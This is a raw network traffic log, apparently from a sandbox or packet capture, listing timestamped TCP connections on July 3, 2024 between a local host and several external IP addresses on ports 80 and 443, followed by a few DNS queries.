        Jul 3, 2024 17:58:43.243824959 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.243840933 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.243849039 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.244252920 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.244265079 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.244287968 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.244302988 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.244389057 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.244400978 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.244420052 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.244431973 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.244765043 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.244776011 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.244786978 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.244796991 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.244805098 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.244807959 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.244818926 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.244832039 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.244843960 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.245635033 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.245651007 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.245661020 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.245671988 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.245676994 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.245682955 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.245699883 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.245714903 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.245729923 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.246507883 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.246520996 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.246531963 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.246542931 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.246551991 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.246553898 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.246562958 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.246567011 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.246577978 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.246598959 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.246598959 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.247353077 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.247368097 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.247379065 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.247395039 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.247400045 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.247404099 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.247412920 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.247415066 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.247425079 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.247430086 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.247447968 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.247456074 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.464277029 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.464426994 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.533509970 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.900840044 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.900917053 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.900922060 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.900928020 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.900974989 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.901196003 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.901241064 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.901251078 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.901262999 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.901273966 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.901289940 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.901303053 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.901921988 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.901933908 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.901943922 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.901956081 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.901964903 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.901967049 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.901982069 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.901990891 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.902757883 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.902770042 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.902780056 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.902791977 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.902801037 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.902813911 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.902813911 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.902813911 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.902827024 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.902834892 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.902848005 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.903620958 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.903633118 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.903644085 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.903655052 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.903664112 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.903669119 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.903676033 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.903688908 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.903697014 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.904422998 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.904436111 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.904445887 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.904457092 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.904467106 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.904468060 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.904479027 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.904495955 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.904496908 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.904496908 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.904508114 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.904514074 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.904525995 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.904542923 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.905363083 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.905375957 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.905385971 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.905396938 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.905406952 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.905411005 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.905419111 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.905425072 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.905431032 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.905441999 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.905443907 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.905451059 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.905472994 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.906280994 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.906294107 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.906303883 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.906316042 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.906325102 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.906327009 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.906338930 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.906342983 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.906349897 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.906352043 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.906362057 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.906382084 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.906382084 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.906394005 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.907160044 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.907175064 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.907210112 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.907227993 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.907229900 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.907242060 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.907253027 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.907263994 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.907265902 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.907275915 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.907285929 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.907298088 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.907309055 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.907977104 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.908019066 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.908349037 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.908397913 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.908658028 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.908668995 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.908704996 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.908716917 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.908730030 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.908742905 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.908754110 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.908765078 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.908771992 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.908785105 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.908797026 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.909205914 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.909216881 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.909228086 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.909240007 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.909248114 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.909262896 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.909929991 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.909941912 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.910007954 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.913036108 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.913122892 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.913152933 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.913165092 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.913206100 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.913223028 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.913360119 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.913371086 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.913400888 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.913409948 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.913412094 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.913453102 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.913453102 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.913961887 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.913973093 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.913985014 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.914005995 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.914019108 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.914203882 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.914212942 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.914222956 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.914233923 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.914258957 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.914269924 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:44.109888077 CEST4916580192.168.2.22192.185.89.92
        Jul 3, 2024 17:58:44.114936113 CEST8049165192.185.89.92192.168.2.22
        Jul 3, 2024 17:58:44.115005970 CEST4916580192.168.2.22192.185.89.92
        Jul 3, 2024 17:58:44.115096092 CEST4916580192.168.2.22192.185.89.92
        Jul 3, 2024 17:58:44.119960070 CEST8049165192.185.89.92192.168.2.22
        Jul 3, 2024 17:58:44.653597116 CEST8049165192.185.89.92192.168.2.22
        Jul 3, 2024 17:58:44.653666973 CEST4916580192.168.2.22192.185.89.92
        Jul 3, 2024 17:58:44.941876888 CEST4916680192.168.2.22192.185.89.92
        Jul 3, 2024 17:58:44.947175026 CEST8049166192.185.89.92192.168.2.22
        Jul 3, 2024 17:58:44.947242975 CEST4916680192.168.2.22192.185.89.92
        Jul 3, 2024 17:58:44.947357893 CEST4916680192.168.2.22192.185.89.92
        Jul 3, 2024 17:58:44.952136040 CEST8049166192.185.89.92192.168.2.22
        Jul 3, 2024 17:58:45.519617081 CEST8049166192.185.89.92192.168.2.22
        Jul 3, 2024 17:58:45.522869110 CEST4916780192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:45.527699947 CEST8049167198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:45.527770042 CEST4916780192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:45.527859926 CEST4916780192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:45.533581972 CEST8049167198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:45.727771044 CEST4916680192.168.2.22192.185.89.92
        Jul 3, 2024 17:58:45.728163004 CEST8049166192.185.89.92192.168.2.22
        Jul 3, 2024 17:58:45.728216887 CEST4916680192.168.2.22192.185.89.92
        Jul 3, 2024 17:58:46.016033888 CEST8049167198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:46.211448908 CEST4916780192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:47.564268112 CEST8049163192.185.89.92192.168.2.22
        Jul 3, 2024 17:58:47.564344883 CEST4916380192.168.2.22192.185.89.92
        Jul 3, 2024 17:58:48.058844090 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:48.058934927 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:49.517184973 CEST4916880192.168.2.22192.185.89.92
        Jul 3, 2024 17:58:49.522716999 CEST8049168192.185.89.92192.168.2.22
        Jul 3, 2024 17:58:49.522810936 CEST4916880192.168.2.22192.185.89.92
        Jul 3, 2024 17:58:49.523022890 CEST4916880192.168.2.22192.185.89.92
        Jul 3, 2024 17:58:49.528449059 CEST8049168192.185.89.92192.168.2.22
        Jul 3, 2024 17:58:49.657886982 CEST8049165192.185.89.92192.168.2.22
        Jul 3, 2024 17:58:49.657982111 CEST4916580192.168.2.22192.185.89.92
        Jul 3, 2024 17:58:50.059082985 CEST8049168192.185.89.92192.168.2.22
        Jul 3, 2024 17:58:50.267446041 CEST4916880192.168.2.22192.185.89.92
        Jul 3, 2024 17:58:50.373819113 CEST4916880192.168.2.22192.185.89.92
        Jul 3, 2024 17:58:50.660758972 CEST8049168192.185.89.92192.168.2.22
        Jul 3, 2024 17:58:50.660815954 CEST4916880192.168.2.22192.185.89.92
        Jul 3, 2024 17:58:50.664863110 CEST8049168192.185.89.92192.168.2.22
        Jul 3, 2024 17:58:50.664907932 CEST4916880192.168.2.22192.185.89.92
        Jul 3, 2024 17:58:50.665560007 CEST8049166192.185.89.92192.168.2.22
        Jul 3, 2024 17:58:50.665618896 CEST4916680192.168.2.22192.185.89.92
        Jul 3, 2024 17:58:50.665688992 CEST4916680192.168.2.22192.185.89.92
        Jul 3, 2024 17:58:50.669406891 CEST8049168192.185.89.92192.168.2.22
        Jul 3, 2024 17:58:50.672938108 CEST8049166192.185.89.92192.168.2.22
        Jul 3, 2024 17:58:50.828782082 CEST8049168192.185.89.92192.168.2.22
        Jul 3, 2024 17:58:50.830220938 CEST4916880192.168.2.22192.185.89.92
        Jul 3, 2024 17:58:50.836009026 CEST8049168192.185.89.92192.168.2.22
        Jul 3, 2024 17:58:50.836061001 CEST4916880192.168.2.22192.185.89.92
        Jul 3, 2024 17:58:51.028877974 CEST8049167198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:51.028942108 CEST4916780192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:51.030931950 CEST4916780192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:51.035693884 CEST8049167198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:51.380336046 CEST4916980192.168.2.22192.185.89.92
        Jul 3, 2024 17:58:51.385844946 CEST8049169192.185.89.92192.168.2.22
        Jul 3, 2024 17:58:51.385919094 CEST4916980192.168.2.22192.185.89.92
        Jul 3, 2024 17:58:51.386015892 CEST4916980192.168.2.22192.185.89.92
        Jul 3, 2024 17:58:51.392765999 CEST8049169192.185.89.92192.168.2.22
        Jul 3, 2024 17:58:51.948626995 CEST8049169192.185.89.92192.168.2.22
        Jul 3, 2024 17:58:51.986943960 CEST4916980192.168.2.22192.185.89.92
        Jul 3, 2024 17:58:51.992460012 CEST8049169192.185.89.92192.168.2.22
        Jul 3, 2024 17:58:51.993525982 CEST4916980192.168.2.22192.185.89.92
        Jul 3, 2024 17:58:52.603429079 CEST4916580192.168.2.22192.185.89.92
        Jul 3, 2024 17:58:52.603634119 CEST4917080192.168.2.22192.185.89.92
        Jul 3, 2024 17:58:52.608334064 CEST8049165192.185.89.92192.168.2.22
        Jul 3, 2024 17:58:52.608494997 CEST8049170192.185.89.92192.168.2.22
        Jul 3, 2024 17:58:52.608545065 CEST4917080192.168.2.22192.185.89.92
        Jul 3, 2024 17:58:52.608647108 CEST4917080192.168.2.22192.185.89.92
        Jul 3, 2024 17:58:52.613569975 CEST8049170192.185.89.92192.168.2.22
        Jul 3, 2024 17:58:53.151038885 CEST8049170192.185.89.92192.168.2.22
        Jul 3, 2024 17:58:53.151278019 CEST4917080192.168.2.22192.185.89.92
        Jul 3, 2024 17:58:53.154165030 CEST4917180192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:53.160221100 CEST8049171198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:53.160291910 CEST4917180192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:53.160409927 CEST4917180192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:53.165478945 CEST8049171198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:53.652770042 CEST8049171198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:53.652992964 CEST4917180192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:54.184113026 CEST4917280192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:54.191345930 CEST8049172198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:54.191411972 CEST4917280192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:54.191720963 CEST4917280192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:54.197896957 CEST8049172198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:54.695733070 CEST8049172198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:54.695772886 CEST8049172198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:54.695785046 CEST8049172198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:54.695817947 CEST4917280192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:54.695817947 CEST4917280192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:54.695909977 CEST8049172198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:54.696050882 CEST4917280192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:55.649993896 CEST4917380192.168.2.2291.92.254.29
        Jul 3, 2024 17:58:55.691690922 CEST804917391.92.254.29192.168.2.22
        Jul 3, 2024 17:58:55.691776037 CEST4917380192.168.2.2291.92.254.29
        Jul 3, 2024 17:58:55.692065001 CEST4917380192.168.2.2291.92.254.29
        Jul 3, 2024 17:58:55.697905064 CEST804917391.92.254.29192.168.2.22
        Jul 3, 2024 17:58:56.164355040 CEST4917280192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:56.323698997 CEST804917391.92.254.29192.168.2.22
        Jul 3, 2024 17:58:56.323724031 CEST804917391.92.254.29192.168.2.22
        Jul 3, 2024 17:58:56.323785067 CEST4917380192.168.2.2291.92.254.29
        Jul 3, 2024 17:58:58.152968884 CEST8049170192.185.89.92192.168.2.22
        Jul 3, 2024 17:58:58.153027058 CEST4917080192.168.2.22192.185.89.92
        Jul 3, 2024 17:58:59.590265036 CEST8049171198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:59.590353966 CEST4917180192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:59.594336987 CEST8049171198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:59.594388008 CEST4917180192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:59.596335888 CEST8049171198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:59.596379042 CEST4917180192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:59.599617958 CEST8049171198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:59.599664927 CEST4917180192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:59.996850014 CEST49174443192.168.2.22188.114.96.3
        Jul 3, 2024 17:58:59.996902943 CEST44349174188.114.96.3192.168.2.22
        Jul 3, 2024 17:58:59.997019053 CEST49174443192.168.2.22188.114.96.3
        Jul 3, 2024 17:58:59.997353077 CEST4917580192.168.2.22192.185.89.92
        Jul 3, 2024 17:59:00.000993013 CEST49174443192.168.2.22188.114.96.3
        Jul 3, 2024 17:59:00.001013994 CEST44349174188.114.96.3192.168.2.22
        Jul 3, 2024 17:59:00.012000084 CEST8049175192.185.89.92192.168.2.22
        Jul 3, 2024 17:59:00.016083002 CEST4917580192.168.2.22192.185.89.92
        Jul 3, 2024 17:59:00.016228914 CEST4917580192.168.2.22192.185.89.92
        Jul 3, 2024 17:59:00.020993948 CEST8049175192.185.89.92192.168.2.22
        Jul 3, 2024 17:59:00.494719028 CEST44349174188.114.96.3192.168.2.22
        Jul 3, 2024 17:59:00.494801044 CEST49174443192.168.2.22188.114.96.3
        Jul 3, 2024 17:59:00.527924061 CEST49174443192.168.2.22188.114.96.3
        Jul 3, 2024 17:59:00.527960062 CEST44349174188.114.96.3192.168.2.22
        Jul 3, 2024 17:59:00.528409004 CEST44349174188.114.96.3192.168.2.22
        Jul 3, 2024 17:59:00.577826023 CEST8049175192.185.89.92192.168.2.22
        Jul 3, 2024 17:59:00.588747978 CEST4917580192.168.2.22192.185.89.92
        Jul 3, 2024 17:59:00.597320080 CEST8049175192.185.89.92192.168.2.22
        Jul 3, 2024 17:59:00.598066092 CEST4917580192.168.2.22192.185.89.92
        Jul 3, 2024 17:59:00.676173925 CEST49174443192.168.2.22188.114.96.3
        Jul 3, 2024 17:59:00.720508099 CEST44349174188.114.96.3192.168.2.22
        Jul 3, 2024 17:59:00.778498888 CEST44349174188.114.96.3192.168.2.22
        Jul 3, 2024 17:59:00.778532982 CEST44349174188.114.96.3192.168.2.22
        Jul 3, 2024 17:59:00.778568029 CEST49174443192.168.2.22188.114.96.3
        Jul 3, 2024 17:59:00.778583050 CEST44349174188.114.96.3192.168.2.22
        Jul 3, 2024 17:59:00.778640985 CEST44349174188.114.96.3192.168.2.22
        Jul 3, 2024 17:59:00.778671980 CEST49174443192.168.2.22188.114.96.3
        Jul 3, 2024 17:59:00.778678894 CEST44349174188.114.96.3192.168.2.22
        Jul 3, 2024 17:59:00.778704882 CEST44349174188.114.96.3192.168.2.22
        Jul 3, 2024 17:59:00.778733969 CEST49174443192.168.2.22188.114.96.3
        Jul 3, 2024 17:59:00.781588078 CEST49174443192.168.2.22188.114.96.3
        Jul 3, 2024 17:59:00.875781059 CEST4917680192.168.2.22192.185.89.92
        Jul 3, 2024 17:59:00.881412983 CEST8049176192.185.89.92192.168.2.22
        Jul 3, 2024 17:59:00.881480932 CEST4917680192.168.2.22192.185.89.92
        Jul 3, 2024 17:59:00.881969929 CEST4917680192.168.2.22192.185.89.92
        Jul 3, 2024 17:59:00.886951923 CEST8049176192.185.89.92192.168.2.22
        Jul 3, 2024 17:59:01.420353889 CEST8049176192.185.89.92192.168.2.22
        Jul 3, 2024 17:59:01.420583010 CEST4917680192.168.2.22192.185.89.92
        Jul 3, 2024 17:59:01.426590919 CEST8049176192.185.89.92192.168.2.22
        Jul 3, 2024 17:59:01.426748037 CEST4917680192.168.2.22192.185.89.92
        Jul 3, 2024 17:59:01.832801104 CEST804917391.92.254.29192.168.2.22
        Jul 3, 2024 17:59:01.832937956 CEST4917380192.168.2.2291.92.254.29
        Jul 3, 2024 17:59:01.832937956 CEST4917380192.168.2.2291.92.254.29
        Jul 3, 2024 17:59:01.837933064 CEST804917391.92.254.29192.168.2.22
        Jul 3, 2024 18:00:26.842425108 CEST4917080192.168.2.22192.185.89.92
        Jul 3, 2024 18:00:26.842561007 CEST4917180192.168.2.22198.46.178.139
        TimestampSource PortDest PortSource IPDest IP
        Jul 3, 2024 17:58:41.925688982 CEST5456253192.168.2.228.8.8.8
        Jul 3, 2024 17:58:41.932961941 CEST53545628.8.8.8192.168.2.22
        Jul 3, 2024 17:58:44.098741055 CEST5291753192.168.2.228.8.8.8
